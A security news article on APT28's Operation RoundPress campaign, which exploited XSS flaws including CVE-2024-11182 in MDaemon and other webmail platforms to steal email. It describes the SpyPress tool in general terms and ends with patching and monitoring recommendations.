A newly uncovered cyber-espionage campaign, Operation RoundPress, has been linked to the Russian state-sponsored threat actor APT28, also known as Fancy Bear, Sednit, and BlueDelta. The attackers exploited multiple webmail platforms, including a previously unknown vulnerability (CVE-2024-11182) in MDaemon, to infiltrate government and defense organizations across the globe.
Campaign Overview: Operation RoundPress
Discovered by researchers at ESET, Operation RoundPress is an ongoing cyber campaign that began in early 2023. The goal of the operation is clear: to gain unauthorized access to sensitive email accounts and exfiltrate confidential communications. The campaign uses cross-site scripting (XSS) vulnerabilities to achieve its objectives, including one critical zero-day flaw in MDaemon Webmail software.
APT28 is a well-documented Russian cyber espionage group with ties to Russia’s GRU military intelligence agency. Known for sophisticated attacks on political, defense, and critical infrastructure targets, APT28 has a long history of exploiting software vulnerabilities to steal intelligence.
CVE-2024-11182 – MDaemon Zero-Day
The key vulnerability leveraged in this campaign is CVE-2024-11182, an XSS vulnerability in MDaemon Webmail. It allowed attackers to embed malicious JavaScript in the HTML body of an email. When unsuspecting users opened the email using a vulnerable webmail client, the script executed in the browser, allowing the attacker to perform actions on behalf of the user.
The vulnerability, rated 5.3 on the CVSS scale, remained unpatched until November 2024, when MDaemon version 24.5.1 was released to address the flaw.
Other affected platforms in the campaign included Zimbra, Roundcube, and Horde, all popular open-source webmail solutions. The vulnerability allowed attackers to steal login credentials, read and forward emails, and harvest contact lists without user interaction.
SpyPress Malware and Data Exfiltration
APT28 employed a custom tool dubbed SpyPress in these attacks. Once the malicious JavaScript was triggered, SpyPress would:
- Extract the victim’s webmail login credentials
- Download entire mailboxes, including contacts and attachments
- Create Sieve rules to automatically forward incoming emails to attacker-controlled addresses
This approach enabled persistent access to targeted accounts, even after users changed their passwords—making the attack stealthy and long-lasting.
According to Matthieu Faou, ESET Senior Malware Researcher:
“The ultimate goal of this operation is to steal confidential data from specific email accounts.”
Global Reach of the Attacks
While the primary focus of the campaign appeared to be government and military organizations in Eastern Europe, ESET also observed targets in Africa, Western Europe, and South America. This wide net underscores the threat’s global implications and the growing reach of Russian cyber operations.
APT28 has previously conducted similar operations, such as exploiting CVE-2023-23397 in Microsoft Outlook and vulnerabilities in Windows Print Spooler. Operation RoundPress continues this trend, with a focus on exploiting communication platforms.
Mitigation Recommendations
Organizations using MDaemon or other webmail platforms should take the following steps immediately:
- Upgrade to MDaemon version 24.5.1 or later
- Apply all available patches for Roundcube, Zimbra, and Horde
- Harden webmail interfaces with Web Application Firewalls (WAFs)
- Monitor email rule changes and suspicious login behavior
- Conduct user training on identifying malicious email behavior
- Use behavior-based EDR solutions to detect anomalies post-exploitation
APT28’s Persistent Threat
APT28 remains one of the most persistent and technically skilled APT groups in operation today. Their focus on exploiting email infrastructure highlights the critical need for organizations to maintain vigilance around communication systems. With the public disclosure of CVE-2024-11182, it’s likely that other threat actors may adopt similar tactics, making patching and monitoring more essential than ever.